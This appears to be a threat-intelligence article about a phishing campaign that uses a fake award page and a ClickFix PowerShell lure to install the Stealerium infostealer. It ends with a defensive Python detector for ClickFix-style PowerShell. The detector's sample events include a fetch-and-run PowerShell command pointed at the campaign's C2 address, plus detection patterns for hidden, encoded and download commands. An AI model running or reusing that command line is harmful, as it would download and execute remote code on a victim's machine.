Beware of the New ‘Executive Award’ Campaign That Uses ClickFix to Deliver Stealerium Malware

A new phishing campaign is targeting organizations with a deceptive “Executive Award” theme that combines credential-harvesting social engineering with a ClickFix-style malware delivery stage.

This two-stage attack first tricks users into sharing their login credentials through a fake HTML form, then deploys the Stealerium information stealer to compromise affected systems.

The campaign represents a growing trend where attackers combine credential theft with malware infections in a single, coordinated operation.

The attack begins with a polished HTML phishing page titled “Virtual-Gift-Card-Claim.html” that mimics a legitimate corporate award notification.

Users who interact with this page believe they are verifying their account credentials to claim an executive award; instead, the form posts their login information straight to an attacker-controlled Telegram bot, which the campaign uses as its collection and command-and-control channel.

Award scam (Source - X)

This credential harvesting phase serves as the first stage of the infection chain.

SpiderLabs security analysts identified the malware after analyzing the campaign’s infrastructure and attack patterns.

The researchers discovered that once a user falls for the phishing page, a malicious SVG file named “account-verification-form.svg” is delivered in the second stage.

This file leads to a PowerShell script delivered through a ClickFix chain. ClickFix is a social-engineering technique rather than an exploit: the victim is shown a fake verification or error prompt and instructed to paste a pre-staged command into the Windows Run dialog or a PowerShell console and press Enter, so the victim launches the malicious command themselves.

The PowerShell code then downloads and installs the Stealerium infostealer on the victim’s computer without the user’s knowledge or consent.

Stealerium represents a serious threat because it operates silently to extract sensitive information from infected systems.

The malware communicates with command-and-control servers at 31.57.147.77:6464 and uses multiple download endpoints to retrieve additional components and commands.

This architecture allows attackers to adapt their attack in real time based on system conditions and security measures already in place.

Understanding the Infection Mechanism and PowerShell Execution

The attack’s strength lies in turning legitimate Windows features and ordinary user actions against the victim. SVG is an XML image format that browsers render and that can carry embedded script, which makes a file named like a verification form a convenient carrier for the ClickFix lure; once the user follows the prompt, the PowerShell stage runs with the user’s own privileges and little visibility.

Because the user launches the command from the Run dialog or a console, the resulting PowerShell process is a child of explorer.exe or the user’s shell and runs in a normal interactive session, which is why it often fails to trip controls tuned for macro- or exploit-driven execution.

From there, Stealerium downloads additional components, including the main DLL file, batch scripts, and command executables.

The malware then establishes persistence, ensuring it survives system restarts and continues stealing data. Organizations should monitor for unusual PowerShell activity, suspicious SVG file execution, and network connections to the identified command-and-control infrastructure at 31.57.147.77:6464.

Endpoint detection systems should be configured to flag PowerShell spawned by explorer.exe, a browser, or an Office application, and command lines that hide the window, pass an encoded command, or download and invoke remote content, all hallmarks of ClickFix lures.

Network controls should block outbound connections to the known malicious IP address and watch for DNS lookups and connections to any other infrastructure attributed to this campaign.
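The following is an added example, not code from the article or from SpiderLabs, that turns the execution path described under “Understanding the Infection Mechanism” and the monitoring guidance above into a small detector. It scores constructed Sysmon-like process-creation and network-connection events for PowerShell launched from an interactive parent (explorer.exe for the Run dialog, or a browser) with ClickFix-style command-line traits, and for connections to the published endpoint 31.57.147.77:6464. The event schema, the sample events, the indicator list and the alert thresholds are this example’s own assumptions; the article does not quote the campaign’s exact command line.

```python
"""Score Windows telemetry for ClickFix-style PowerShell and the known C2.

Example code written for this page; the event schema, sample events,
indicator regexes and thresholds are assumptions, not SpiderLabs' logic.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# The only network IOC the article publishes.
KNOWN_C2 = {("31.57.147.77", 6464)}

# Interactive parents that should not normally spawn PowerShell.  explorer.exe
# is the parent of anything launched from the Win+R Run dialog, which is how a
# ClickFix lure gets its pasted command executed; browsers and Office follow.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe",
                       "outlook.exe", "winword.exe", "excel.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line traits common to ClickFix paste-and-run payloads in general
# (assumption: generic indicators, not this campaign's exact command line).
CMDLINE_INDICATORS = {
    "hidden-window": re.compile(r"-(?:w|win|window|windowstyle)\s+hidden", re.I),
    "encoded-command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web-download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b", re.I),
    "no-profile": re.compile(r"-(?:nop|noprofile)\b", re.I),
}


@dataclass
class Finding:
    event_index: int
    rule: str
    detail: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def cmdline_indicators(cmdline: str) -> list[str]:
    """Names of the ClickFix command-line traits present in cmdline."""
    return [name for name, rx in CMDLINE_INDICATORS.items() if rx.search(cmdline)]


def check_process(idx: int, ev: dict) -> Optional[Finding]:
    """Alert on PowerShell from an interactive parent with any indicator, or
    on two indicators from any parent; a lone -NoProfile from a service is not
    enough, which keeps routine deployment scripts quiet."""
    if _basename(ev["Image"]) not in POWERSHELL:
        return None
    parent = _basename(ev.get("ParentImage", ""))
    hits = cmdline_indicators(ev.get("CommandLine", ""))
    if parent in INTERACTIVE_PARENTS and hits:
        return Finding(idx, "clickfix_powershell",
                       f"{parent} spawned PowerShell with {', '.join(hits)}")
    if len(hits) >= 2:
        return Finding(idx, "suspicious_powershell_cmdline", ", ".join(hits))
    return None


def check_network(idx: int, ev: dict) -> Optional[Finding]:
    """Alert on any process connecting to the published C2 endpoint."""
    dest = (ev["DestinationIp"], int(ev["DestinationPort"]))
    if dest in KNOWN_C2:
        return Finding(idx, "known_c2_connection",
                       f"{_basename(ev['Image'])} -> {dest[0]}:{dest[1]}")
    return None


def analyze(events: list[dict]) -> list[Finding]:
    """Run the process and network checks over a list of events in order."""
    findings = []
    for i, ev in enumerate(events):
        f = check_process(i, ev) if ev["EventType"] == "ProcessCreate" else check_network(i, ev)
        if f:
            findings.append(f)
    return findings


# Constructed sample telemetry (Sysmon-like field names; not captured data).
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",   # Run-dialog launch
     "CommandLine": "powershell.exe -w hidden -nop -c \"iex (New-Object Net.WebClient)"
                    ".DownloadString('http://31.57.147.77:6464/x')\""},
    {"EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",   # benign deployment
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\Deploy\Install.ps1"},
    {"EventType": "NetworkConnect",
     "Image": r"C:\Users\victim\AppData\Local\Temp\update.exe",
     "DestinationIp": "31.57.147.77", "DestinationPort": "6464"},
    {"EventType": "NetworkConnect",
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": "443"},
    {"EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": "powershell -w hidden -enc SQBFAFgAIABpAHcAcgAgAGgAdAB0AHAA"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] event {f.event_index}: {f.detail}")
```

Run against the constructed events, the detector alerts on the Run-dialog launch, the connection to 31.57.147.77:6464 and the browser-spawned encoded command, and stays quiet on the two administrative PowerShell invocations. Feeding it real Sysmon Event ID 1 and 3 records only requires mapping the field names.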

Users should remain vigilant about unsolicited emails claiming executive recognition or award notifications, as these remain effective social engineering vectors.
